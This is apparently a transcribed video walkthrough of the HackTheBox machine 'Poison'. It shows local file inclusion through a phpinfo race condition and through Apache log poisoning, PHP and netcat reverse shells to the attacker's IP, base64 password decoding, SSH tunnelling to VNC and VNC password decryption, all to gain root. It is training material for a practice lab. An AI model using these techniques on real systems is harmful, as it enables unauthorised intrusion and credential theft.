What's going on YouTube? This is Ipsec and we're doing Poison from HackTheBox, and I both loved and hated this machine. I loved a lot of the LFI aspects around the machine, and I hated that you could bypass every single one if you just found the password file in the HTTP root directory and decoded it to get a SSH password. There were two different LFIs that I know about. The first one probably the intended way, and that's through log poisoning, hence the name Poison. And the second LFI was a bit tougher to do. The author left a PHP-info script on there, and there's a pretty cool exploit chain where you can abuse the PHP-info script to leak the temporary file name of a uploaded file, and while doing that, call that file through a LFI exploit. So we're going to do that one first because I haven't done it yet, and I find it fascinating. Then we'll go in and do the log poisoning one. So let's just jump in. Before we run the Nmap, I wanted to show off something I just found out about. It's a Nmap XML style sheet that converts the Nmap XML output into a Bootstrap web page, which makes it very, very pretty. So I'm going to make a directory called Nmap and go into it. Then go over to Google and search Nmap XSL Bootstrap. And go to the very first result, which is Hans-Net's GitHub repository. You could clone this or just download the file you want, which was that nmap-bootstrap.xml, or XSL for XML style sheet, I believe, or style language, or something weird like that. But download this file, and if you want to give this report to someone else, host this file on your own web server, or you could just use this URL, but using locations that you don't own is pretty dangerous, so always recommend hosting stuff on your own. So in order to use this, we want to just run a standard nmap command, so -sc for default scripts, sv enumerate versions, oa output all formats. We'll call it poison, and then we'll do a -- style sheet nmap-bootstrap.xsl. And if we had hosted this on a web server, you could put the HTTP location, and Nmap will always go and pull that, so you don't have to give them two files. The final argument is always the IP address, and this will take probably 15 to 20 seconds to run. I didn't pre-run it because I wanted to show exactly how this all works. So Nmap has finished now, and we have just the standard output you'd expect. We see SSH is listening on port 22. This is a free BSD box, and SSH looks like it was built in 2016. Then we have Apache listening. It's version 2429. It's also a free BSD, so it backs up that this is indeed a BSD box. And we also got the PHP version leakage, and Apache's listening on port 80. So nothing out of the ordinary there. And the real magic's going to come when we do Firefox on poison.xml. And this will be that Bootstrap web page we had just created. So it's relatively easy to read, and if you have a lot of hosts, this like open services thing is nice. Display entries, go, whatnot. Just a pretty cool thing I thought I'd show off. So let's go to the open services and HTTP on port 80. So that is the very first thing we want to check out. So go to 10.10.10.84. and we get this web page. It's just a temporary website to test local.php scripts. So let's begin by just testing all the scripts that says sites to be tested. So let's open a new tab, 10.10.10.84, and go down the list. So any.php, 10.10.84, any.php, 10.10.84 / what's the next one? info.php. Next one is, we should just do multiple. So we did any, list files, and phpinfo.php. So 10.10.84, list files.php, 10.10.84, phpinfo.php. So I believe we have opened all the scripts. That's 1, 2, 3, 4, and we got 1, 2, 3, 4. So let's take a look at what the scripts are. Any.php, no clue what this is. We can view the source to make it a bit more user-friendly. What's happening here is web pages only break when you have that --br and if you view source, the actual line breaks get obeyed. So much prettier that way, but no idea what command that is. Go to the next one. This looks like it's just running a uname command. Next, we have files in the directory, and there is a file called pwdbackup.txt, which we didn't see. And I don't know if we saw browse.php, so that's another one. That's actually, spoiler alert, when we go to a type of script, it goes to browse.php. So that's what that one is. pwd backup, again, we'll get into this a little bit later. It's a bunch of base64, and you eventually get a nice password out of it. But that's not a fun way to do this box. You skip a lot if you just immediately do that. So put that on the back burner. We get this phpinfo page, which I'm glad the author had put this in. This leads to my way of doing the local shell because it's unique and you learn something. I haven't actually showed this in a video yet, and I have like 70 videos out there, so this is going to be pretty cool. The key thing to look for is upload, and we want to see file uploads is enabled on this PHP page. What's going to happen is we can upload a temp file. This phpinfo is going to tell us where that file is. We can do an LFI to execute it. If that doesn't make sense, we'll get to it in probably 5 minutes. So with that information, we want to look at this browse.php, and the easiest way to do that is in burp. So I'm going to right click on Foxy Proxy, use burp suite, make sure burp is set to intercept web traffic, and we'll just put a script name of please subscribe. It doesn't matter because we're going to be renaming this in a second. So send this over to repeater with Control-R, Control-Shift-R to go to the tab. And then if we send this, we can see it failed opening the file please subscribe. It didn't append.php or anything, so we can just say, let's try going to index.php. And it actually executes the index.php page. If we wanted to view the source of index.php, we probably can try like a PHP filter. So php://filter convert.base64 encode resource is equal to index.php. And that's going to convert this into base64. And the key thing there is if it converts it to base64, then Apache's never going to read these tags, which means PHP doesn't get executed. So this is why we can exfil PHP source code with this method. If you want to do more of this, check out the Crime Stoppers video. So decode this, and we just get the page. So we could try, we didn't know what any.php was. So let's do that with any.php and see what's actually going on there. Relatively short command, then echo-n base64-d, and it's just doing expanded print any get all. So I guess this is like get all config variables or something. I'm not exactly positive, but that is that. The very first thing I'm going to test with LFI is see if it is an RFI. So LFI is local file inclusion. We're including local files in this. So I want to see if I can include a remote file. If I can include a remote file, then I can just host a PHP script on my web server, include it, and get code execution. So nc lvnp 80 to listen on port 80 on my box. Go into burp. Set this file to be http 10.10.14.15. I think that's my IP. Ton 0. Yep. And then we'll get any file. And we see the HTTP wrapper is disabled in the configuration, so we can't do that. We can try a different one like FTP. And FTP is disabled. We can try like expect ls to see if the expect wrapper is enabled to get code execution right away. It's not. So we're kind of stuck at this LFI right now. And we know we can get outside of the web directory. So if we include like etc passwd, we can see this and get various users on the box. Cherix is, I guess, the key one to get. If you look at which ones have bash, or we'll do sh. Only 2 lines end with sh, so all these are probably no login, so these are the only 2 users that can log in. So if you decoded that base64 file, the password is going to be to one of these. But that's cheating. We want to do the hard mode, so we're going to go back to a web browser, disable burp for a minute, and search PHP-info LFI. And we're going to go to the very first link. And this is a little bit tough to read, I guess. And we're going to walk through exactly what happens. So if we go back into burp, go to PHP-info. So let's see, repeater tab, and it was just phpinfo.php, I think. Yep. So if we render this, we can view the page. So with file upload on, PHP is going to accept any files that get uploaded to it. It's just going to put it in a cache directory, and as long as users can't hit that file, it's not really causing any harm. But if they can hit the file with like a LFI vulnerability, then there's a potential for getting code execution. So we're going to show off that it actually creates a file. If we look in PHP variables, we don't see anything. So we're going to convert this. So change the request method to post. We got to change this content type to be multi-part form data, and put the boundary is equal to please subscribe. And then we have to do the boundary, please subscribe, content disposition. It's going to be form data, name, can be anything, and file name can be leave a comment. The content type is going to be text plain. And if you use Python or something in like the request module, it's going to automate typing all this stuff in. And for the context of this file, we're going to say, please share my videos. Or content, not context. And then we end the boundary with, please subscribe. And hope I typed all that correctly. And we go back here. Come on, PHP variables. There we go. So we can see the files, the dummy name is there for anything. And now we're creating a file called leave a comment. It's text plain. The temp name is temp PHP, some random strings, and the size is 22. And this is 22 characters. So if we added a few tags, so I think I just added what? That's 3, 4, 7 characters. Go back to PHP variables. Well, we added 6, I guess, or whatever it was at before, but you can see we have complete control over this, and we see the file names created. So all this script is going to do is make a request. It's going to put a bunch of A's in host, user agent, whatever, to create this request as big as possible, so it takes PHP a few milliseconds longer to process. And while it hits this page to upload this file, because as soon as the page finishes loading, PHP deletes the file. So we're hitting a race condition of hitting this PHP info page and then hitting that LFI to call what the PHP info page says before it actually deletes the file. So that's what this script here is doing. So let us copy the script, and it's actually on the payload all the things repository. So payload all the things, GitHub. I should just download that if I haven't already, because this literally has all the tools you ever could want. So let's see. Maybe file inclusion path traversal. Let's search that. Go here. Then yes, this PHP to LFI, it's just in a little bit more friendly format than that PDF that we had. So let's see. We can get out of the Nmap directory, create lfi.py, set paste, paste it in, and we have to modify a few things. So first thing we're going to do is swap out the payload. So take that. And then we want to copy the PHP reverse shell. So I'm just going to find where it is. Copy this. Cat. Edit paste mode. Or copy mode. Whatever it's called. Go back to V. Paste it in. And we have to edit the IP. So let's change this to 10, 10, 14, 15. The port, 9001. We don't need all these comments. Okay. Let's see, that looks fine. Go down. See what else we have to change. Request 1 / phpinfo.php. That looks fine. The LFI request, this is a little bit different. We want / browse.php. And the argument, let's see, do we have it? File. File is equal to %s, which is going to be the file name. I presume, at least. It ended with a null byte, and that's just old versions of PHP. And that should be all we need to modify. So, Python LFI.py. It wants the host, so 10, 10, 10, 84. The port, 80. Threads, we'll do 100. And we want to listen on port 9001. And we get an error message. No PHP temp name and PHP info output. That's a bit odd. So what I'm going to do is go into burp. We can go into options. And that's on the proxy tab. Add a new listener. We're going to bind to port 80 and redirect to host 10, 10, 10, 84, port 80. Okay. Click the checkbox to start this. And then just change the IP to 127.0.0.1. And we have to turn intercept off. We can go to history. And we can see the request the Python thing is making. We can also see the response. So it says no temp name in PHP info. So the script is curling this to try to, well, not curling, but scraping this request to try to get the temp name so it knows where to hit. And we see temp name is here. So let's go back in the code and see exactly how it finds temp name to see what's wrong. So if we go into lfi.py, temp name, and it says temp name, then equals less than sign or greater than. And we have, I guess, PHP changed at some point to do HTML entities. So we don't actually have the caret, or whatever you want to call it, or the greater than sign. We just have and GT. So let's replace that with and GT, temp name, and see if it's anywhere else in the script. Doesn't look like it is. So now let's run this again. And it's spawning the worker pool. It looks like it's trying to cause that race condition. And we'll just give it some time to see if it actually hits it. While it does that, we can double check our script. My VM's going much slower now. LFI, let's do 10, 10, 10, 10, 14, 15, port 9001. That's definitely correct. Go back here. Still spawning the worker threads. See if we get a call back soon. Bet I could do this 1,000 and hit it quicker. Oh, I know what the issue is. We're going through burp, and burp by itself slows everything down because it's Java and not efficient. So let's change this to be 10.10 10.84. And this worker pool should be spawned much, much quicker since we're not going through burp. There we go. And we got a shell. It says that. And down here, we're on the box. So if we do hostname, we're on poison. And if we went into home Cherix, I can actually get into Cherix this way. Var log. Not exactly sure. I'm trying to think now. Let's see. Oh, we have to go to www. So PSAUXW, I think. There we go. Let's see if we can find where Apache configuration is. I hate BSD. Because I don't think it's in var dub. No, it's not. User local dub Apache 24 data, and now we can get this pwdbackup.txt, and we see this file. This actually has the password, so if we copy this echo-n pwdbackup.txt, then if we base64-d that file, it's still base64 encoded. And if you read the contents of it, it says it's encoded at least 13 times. So if we base64-d, base64-d that, and just keep going down the chain, eventually we get it. So what I'm going to do is just going to do for I in sec 0 to 12, that count 0, so it's 13 times. Yeah, we can do that. Then we're going to pipe base64-d echo. And we went -n to not do a line break. And that was probably really confusing to follow. We forgot the do. So all that did was print pipe base64-d 13 times. So we can copy that. We can cat pwdbackup, paste it, and we get a password. So at this point, we can SSH as Cherix at 10.10.10.84. Or we could probably Python C import pty.spawn bin bash Python 3-c. We can do which first to see if it exists. Which Python 3, which maybe Python's not installed in this box. And copy this password, paste it in SSH, and now we could get user.txt. So that is pretty much two ways to get the user shell. As you saw a while ago before we did that whole phpinfo thing, we saw pwd.txt or pwdbackup.txt, whatever the file name was, off the web server. I personally think it was a mistake to leave that on the web server. Should have forced getting a shell to get to the file. But before we get into the actual routing of the box, let's get shell a different way, and probably the intended way, because the box is called poison, and we're going to do a log poisoning attack against this box to get code execution. So let's go back to our Firefox and go to the page. So 10.10.10.84. So in order to understand how log poisoning works, let's find a log to view. And if we look at Apache log free BSD to get the location, let's see, where is it? Verlog httpd, and there's -error.log and -access.log. So we want -access.log. So if we go back to our browser. There we go. And we want to go verlog httpd access.log. And we can view this page. It's relatively big because it's the Apache access log. The better way to view it probably would be through curl. So we can just curl this file. And we can see this is all from our PHP-LFI exploit. Then we have stuff from Nmap. But the key thing is, at the very bottom of this, we see the user agent. So if I turn burps intercept on, go to Firefox, enable it, and we're going to go to, let's go 10.10.10.84, any page, doesn't matter. Send this into burp. We can change the user agent to be please subscribe. Put this on repeater tab so it's just easier to navigate. Page wasn't found. If we curl the access log and look at the very, very bottom, it's going to take a few seconds to go through this entire thing. We see the get any page, it doesn't matter. And the user agent here is please subscribe. So we have complete control over this. And as we probably said before, if you put PHP code and the page is executing it, so we can do PHP echo please subscribe, we're not going to see this PHP tag. If we see the PHP call, we know it's not passed to like an eval or something. But if we don't see it, we know it actually executed it, and we may have just hosed the box because something silly happened. I'm not sure exactly what. I think we put HTML in these quotes and now PHP has an error. What I mean by that is a request has a double quote. I think when we sent it, the server translated a double quote to and quote, which means our PHP code is bad and we should feel bad. So we're going to skip this part. We'll come back to it at the end when we root the box and can actually modify the logs. Let's see. Do we actually have modify privileges? There's our shell. We can just cat the file. So what was it? Verlog. If we tail HTTP access log, I think it's HTTPD access log. We can see, what did we do? Yeah, it escaped our thing. So ls-la on, let's see, HTTPD. We cannot write the file, only root can. So yeah, we have to root the box so we can fix this, because these backslashes are breaking our script. Probably should have tested for that before doing this, but I guess you only live once. So let's go to our SSH session, wherever that was, channel 3. We can kill 4 and come back to that eventually. So we want to get this secret.zip file off. So let's base64 encode it. And base64 is not found because this is BSD. Let's SCP it off. So copy the password. And then SCP Cherix at 10.10.10.84. File name secret.zip. Current directory. Wait for this whole, I guess, Diffie Hellman or whatever to take place at doing a DNS lookup and failing because it's SSH. And then we'll type the password in, get this file, and be able to analyze what it is. While that's going on, oh, there we go. So we got the file. We can try unzipping it. It wants a password. Try the password we already have, which was that, the same thing as SSH, and it extracts secret. If we do file against it, we just see it's ASCII text with no line terminators. If we try to cat it, it's all garbage. So we have no idea what this file is. Going back on how I did the PrivEsc, we go to opt, what was it, PrivEsc? Where's my Linux PrivEsc stuff? Find /opt grep -i lin enum. Do we have it? I don't have linenum.sh anymore. Let's go grab that. So Google, we'll disable burp so we go a little bit quicker. linenum.sh, GitHub. Go here. Raw. Copy. And let's just double check by looking at the forks, see if there's one that's much farther ahead. Where's the graph? We won't worry about that. Let's just use this one. So make the directory www.sh, paste it, and then Python -m simple HTTP server curl 10 10 14 15 port 8000 lin enum.sh bash. That's not found. Dev shm, not there. Go in wget or /tmp. Then we can wget the script. Lin enum.sh. Execute it. chmod +x. I guess we don't have bash, it's only shell. Can we copy to our home directory? Let's see what its permissions are. We can execute it. CSH I think is BSD. See if it works. So this script probably isn't going to work, so let's just look at the things we care about. So we want to look at processes, so PSAUXW, and just go through them a little bit. We have a bunch of shells. That's garbage. Let's see. Here's a root process running VNC, which is unique. If I do PSAUXW less dash, I think W for wrap. There we go. We can search VNC to get there and see all the arguments. It ended at geometry. But we have VNC running, and we normally don't see VNC running. It's tight VNC as well. And we have auth root.xauthority. If we do a netstat-an and grep for listening, we also see VNC is listening on port 5801 and 5901. So let's do a SSH tunnel to this port. And I'm lazy. I don't want to kill my current SSH connection. So we're going to go back to Google and Google Konami SSH code to find a post by Jeff McJunkin from Sans, and has a bunch of cool key sequences in SSH that I just didn't know about. So we want squiggly C to open a command line. So new line, squiggly C. We got SSH. And this will allow us to create a port forward. So if we just do -D 9001, it does what the whole starting a new SSH with -D 9001 would have done. Let's just do 1080. So we have a dynamic port forward listening on localhost 1080 going to SSH. And we can verify that by doing netstat anlp grep 1080 And there we go. We're listening on that. So we can go in Firefox, Foxy Proxy. Let's create a new one and say SSH 1080 proxy details 127.0.0.1 port 1080. It's a SOCKS. SSH is SOCKS 5. Close this. Use it. If we go to 127.0.0.1, what was it? 5901. See what happens. Probably nothing because I'm guessing Firefox is configured to not proxy 127.0.0.1. Guessing it's something to do with that. So let's completely disable Foxy Proxy and try this again. So 127.0.0.1. Take out no proxy for 127.0.0.1 5901 5801. Connection reset at those. Go back to SSH. See what it said the ports were. 5901 and 5801. So let's try something else. Proxy chains. SOCKS 5. Put this to be 127.0.0.1, port 1080. And we'll try proxy chaining it. So proxy chain 127.0.0.1, 5901. Cool. Forgot the S. And doesn't look to be working. .5801. Let's see. Looks like my whole SSH connection's dead. That's weird. SSH had completely died there. It wasn't responding. So let's do it manually. So let's specify the dynamic at 1080. And then we can also say 6801 to 5801 and 6901 to 5901. Normally I make these ports the same, and what this is doing is saying, hey, listen on my box, because it's -L for local, so listen on my Kali box on port 6801, send it through SSH, and on the other end of SSH go to 127.0.0.1 5801. The reason I didn't make this 5801 is just because I want to test this dynamic thing to see if that's working. So just because I'm testing two things, I didn't want to put curl 5801 and have it work because of the -L and not the -D. So that's why I did that small separation. Have to get the password again. So let's see. There it is. And I'm really not sure why that SSH connection just decided to not respond. That was odd. Enter the password. Then we can go back here. Proxy chains. File not found. That's more what we expected. 5901. RFB 003.008. This is a VNC thing. So we know that's working. And we can get rid of this proxy chains. And we try to get to 5901. We fail to connect. If we put it to 6901, which was that -L, it's the same exact thing. So we know there's a VNC server. If we do VNC viewer, and then we want, what is it? Host, so 127.0.0.1 and :port 5901. Connection refused. 6901, my bad. And it wants a password. So I'm going to assume that this secret file is some type of password. So let's just do VNC viewer -passwd, and we can do secret and pass that file as the actual password. And there we go. We have VNC on this box, and VNC is like a remote desktop protocol, and it is root. So if we wanted to, we can now go back and fix that log. But before we do that, let's just do one small thing. Let's find out what that password was. So we have this. It's just a bunch of junk, and VNC actually just obfuscates the password. I think it's desencoded, but you have the secret because open source. So VNC password decrypt GitHub. See if we can find this. We have to disable the proxy on our Firefox. No proxy. Go back here. Grab this. Git clone. cnd vnc pw. Make the file. Execute it to see what it wants. It just wants the passwd file, and we can execute it with the file, and we see the password of VNC was vncp@ss or $bang. And all that does is, if we look at it, whoops, it's got the obfuscation key, decrypt, and it doing that. And if you couldn't read the C code, it looks like there's this Python script that does the similar thing. So vnc passwd.py. Yeah. So that is that. I did promise we'd go and fix that log and then do this LFI again. So vi user var log httpd access.log, and let's delete that line of us dorking the server. So delete a few lines, and let's also go to the top of the log file for log. I will delete wow, that's 800 lines I'm deleting several times. Let's just cd var log echo to httpd-access.log. Okay, we got a blank log file to play with. So if we go back to our LFI stuff, let's just go back to please subscribe, and page doesn't exist. Let us go back to this, and we want to do that curl. Do I have it? Yeah, I do. So we can see our user agent right here. So the smart thing to do would have been put a double quote there, click go, and curl, and see it escapes double quotes. And the reason it's doing that is because every parameter in this log is using double quotes. So we got IP, something, date, and then this get is in double quotes for 40217. This dash is in double quotes, and then the user agent is in double quotes. So because we're putting a double quote in there, it escapes that to not mess with this field. And I think that's something specific to FreeBSD. I don't think normal like Ubuntu and stuff will do that. So if we were smart, we would have noticed that beforehand. And since we're not, we're playing a little bit of doing it after. I'm going to try a single quote and see what happens. And there we go. So single quote is just fine. It doesn't do any escaping. Let us... And the reason why the PHP error message gave HTML entity is probably because PHP did that by itself. So PHP, we need the question mark, echo, please subscribe. I put a double quote there again. Do not do that. And then exit that. So if we go to the page, let's see, execute this, view the source, we see we didn't get anything here because it literally did the execute. So if we changed please subscribe to you don't see the PHP tags, refresh this, and you still didn't see the PHP tags, which are these things. So we know we have code execution. So let's put something in here. So let's do system, then server, or not server, request IPsec. So if we click go, view this, we're probably going to have some type of error message, but if we put the argument IPsec is equal to uname-a, we have the command execution right in here. So we could change this to be host name. There we go. We got poison. So that is how you do it through log poisoning. You could wget do the netcat shell. So we could go to pentest monkey, reverse shell cheat sheet, grab this netcat shell. And BSD is weird. It doesn't like this redirect part. Where is it? Let's put it in a terminal so it's a bit easier to read. So we want that mkfifo. We don't want this redirect. And we want to change the IP to 10.10.14.15 for 9002 because we haven't used that. So we can copy this. nclvnp 9002. Paste this in. We'll probably want to send this to burp because I think it's going to encode this weird and not going to work. But we can try. Doesn't look like it's working, so let's send this to burp. Go in burp. We don't need that request. Don't need that. We got a lot of requests for that. Okay. Put a command in, URL encode, and send a repeater. Click go. See if we get a shell. Doesn't look like we do with this one. We could probably just wget that PHP file. I don't feel like playing around with this too much, but leave this one for you. If you want, you can watch the beep video where I do a bunch of other LFI type stuff, but you should be able to get the basic info on how to do this box. So hope you Hope you enjoyed the video. Take care, and I'll see you next week.